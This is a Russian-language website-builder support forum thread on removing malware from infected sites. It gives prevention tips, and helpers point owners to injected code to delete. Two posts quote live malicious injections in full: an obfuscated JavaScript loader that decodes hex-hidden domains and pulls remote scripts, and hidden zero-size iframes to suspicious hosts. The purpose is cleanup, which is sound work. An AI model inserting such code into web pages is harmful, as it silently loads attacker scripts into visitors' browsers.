Модератор форума: Yuri_G  
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    Велес5806
    Сообщений: 9
    Репутация: 0

    Сообщение # 2056 | 10:46:22
    Проблема решена : Вредная ссылка была в нижней части , в копирайте
    breenbrass
    Сообщений: 4
    Репутация: 0

    Сообщение # 2057 | 19:25:53
    Вирус на серии сайтов. 2 моих сайта: питомник и форум+ сайт моего друга:
    breenbrass.narod.ru
    basset.at.ua
    donbasset.at.ua
    На всех трех сайтах с мобильных версий вообще не зайдешь: на всех видах моб устройств страница орет что данный сайт заражен вирусом!
    На сайте моего форума даже на компе выдает зараженный сайт и блокирует его! В любых браузерах и с любых компьютеров с разными анти вирусами!
    basset.at.ua
    Посещаемость упала до нуля!
    Кто то поможет? Спасибо заранее...
    Прикрепления: 9307621.jpg (138.6 Kb)
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 2058 | 19:42:36
    breenbrass, зайдите в редактирование этого материала в хтмл режиме http://basset.at.ua/news/world_dog_show_2015_milan_italy/2015-09-28-11 и удалите
    Код
    <script>window.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="18167",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("basset.at.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();</script><iframe id="a1996667054" src="https://bw95vpjda.ru/f.html" style="display: none;"></iframe>

    форум не вижу без регистрации
    на счет мобильных версий нужен скрин как орет и что именно орет

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Voess
    Сообщений: 13
    Репутация: 0

    Сообщение # 2059 | 17:34:59
    Здравствуйте! Есть несколько сайтов на юкоз.

    Сегодня пропали ссылки из поисковой выдачи яндекса, сайт просто исчез из поиска (и не один).
    В яндекс вебмастере(бета) показывает что у меня ошибка на сайте, и за счет этого будут ограничения в ранжировании.

    Проверил в шаблоне не обнаружил скриптов которые могут влият на ПС.

    Сайт: http://video-futazhi.ru/

    Неужели это из-за того что стоит реклама мобильная (вирусная агрессивная реклама) от Юкоза, и придется на все мои 20 сайтов ставить базовый пакет и платить почти 8 тысяч рублей в месяц (что бы сохранить сайты)? а дохода то особо нет с этих сайтов, за исключением нескольких (да и то копейки).
    Или же это дело не Юкоза, а дело рук поисковых роботов яндекса которые могут ошибаться?

    Неужели придется класть на сайты которые будет невозможно развивать, из-за реклам которые вводят в заблуждение посетителей сайта по мнение ПС.

    вот скрин:

    Video-futazhi.ru - Проекты для АЕ
    interstng.ru - Интересные новости и факты
    Сообщение отредактировал Voess - Вторник, 31 Май 2016, 17:40:14
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 2060 | 18:12:12
    Voess, нажмите возле нашлось 6 проблем - 1 фатальная. там будут подробности. выложите сюда скрин страницы
    Цитата
    Неужели это из-за того что стоит реклама мобильная (вирусная агрессивная реклама) от Юкоза
    ваша реклама тоже может быть. посмотрите. рекламодатель у вас один, а адреса открутки у него разные. как вы думаете почему рекламодатели используют столько адресов открутки и постоянно их меняют. а есть рекламдатели, которые не меняют адреса открутки десятилетиями. как вы думаете. почему?
    но сначала скрин.

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Voess
    Сообщений: 13
    Репутация: 0

    Сообщение # 2061 | 23:00:05
    Данное нарушение до сих пор на месте, но в поиске сайт появился через несколько часов, все равно это настораживает, до этого трафик падал. По запросам тоже позиции падали, но сейчас какое то чудо и снова сайт на своих позициях. Только вот как я понимаю только пользователи через пк могут заходит,ь, а с телефона уже не могут

    .

    А по поводу рекламы, рекломодатель из компании адвмейкер которые на рынке очень давно, и не думаю, что дело в них.
    Прикрепления: 6561399.png (43.4 Kb)

    Video-futazhi.ru - Проекты для АЕ
    interstng.ru - Интересные новости и факты
    Сообщение отредактировал Voess - Вторник, 31 Май 2016, 23:03:05
    breenbrass
    Сообщений: 4
    Репутация: 0

    Сообщение # 2062 | 15:59:25
    webanet, Спасибо огромное за незамедлительный ответ! heart Все получилось love Не подскажите, откуда этот фрэйм прописаться мог?
    Сообщение отредактировал breenbrass - Среда, 01 Июн 2016, 16:07:21
    Светлана8426
    Сообщений: 5
    Репутация: 0

    Сообщение # 2063 | 19:18:08
    Здравствуйте!. Школьный сайт gimnasium-150.ucoz.ru Блокируется. Причину сами найти не можем. Помогите, пожалуйста
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 2064 | 19:39:54
    Светлана8426, из шаблона информера пользователей (который выводит кодличество админов, пользователей и т.д) удалите
    Код
    <iframe src="http://ga1.net.ru/" name="iframe" width="0%" height="0%" scrolling="no" frameBorder=0></iframe>

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Светлана8426
    Сообщений: 5
    Репутация: 0

    Сообщение # 2065 | 19:44:14
    Подскажите пожалуйста антивирусная проверка нашла вирус в коде http://www.gimnasiun-150.ucoz.ru
    хотя гугл и яндекс реагируют нормально, а АВАСТ пишет: На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код.
    Светлана8426
    Сообщений: 5
    Репутация: 0

    Сообщение # 2066 | 19:48:42
    webanet, из статистики я удалила, но меня Аваст материт с прежним интузиазмом
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 2067 | 19:56:33
    Светлана8426, скрин мата аваста выдайте

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 2068 | 20:00:41
    Светлана8426, панель управления - редактор страниц - управление страницами сайта - главная страница - напротив главной нажмите на разводной ключ - страница откроется на редактирование - удалите оттуда два раза эту конструкцию
    Код
    <!--?php

    // iframe удалятор от GlooSoftware.ws

    $virus_start = 'try{q=document.createElement'; //начало вредоносного кода
    $virus_end = 'q=ss;e(q);}'; //конец вредоносного кода
    $skip_files = array ('clean.php'); //название файла - который следует проигнорировать при проверке
    $del = true; //лечим(true) или просто смотрим кол-во зараженных файлов(false)
    $dir = getcwd().'/'; //корень сайта
    $num_infected = 0;

    function dir_walk($callback, $dir, $types = null, $recursive = false, $baseDir = '')
    {
    if ($dh = opendir($dir)) {
    while (($file = readdir($dh))!== false) {
    if ($file === '.' || $file === '..') {
    continue;
    }
    if (is_file($dir . $file)) {
    if (is_array($types)) {
    if (!in_array(strtolower(pathinfo($dir . $file, PATHINFO_EXTENSION)), $types, true)) {
    continue;
    }
    }
    $callback($baseDir, $file);
    }elseif($recursive && is_dir($dir . $file)) {
    dir_walk($callback, $dir . $file . DIRECTORY_SEPARATOR, $types, $recursive, $baseDir . $file . DIRECTORY_SEPARATOR);
    }
    }
    closedir($dh);
    }
    }

    function del_virus($fdir, $ffile)
    {
    $flag = false;
    $filename = $fdir.$ffile;
    echo $filename;

    $file=file($filename);
    foreach($file as $k=-->

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Vlad_A
    Сообщений: 16
    Репутация: 0

    Сообщение # 2069 | 13:50:57
    Добрый день!
    Яндекс-браузер помечает сайт как опасный.
    В Вебмастере информация:

    Как с этим бороться? Спасибо!
    Прикрепления: 2506992.jpg (126.5 Kb)
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 2070 | 17:38:33
    Vlad_A, ищите на форуме ссылку на сторонний сайт, который указал яндекс. адрес сайта, который нужно искать в сообщениях начинается со знака вопроса в примере яндекса

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Поиск: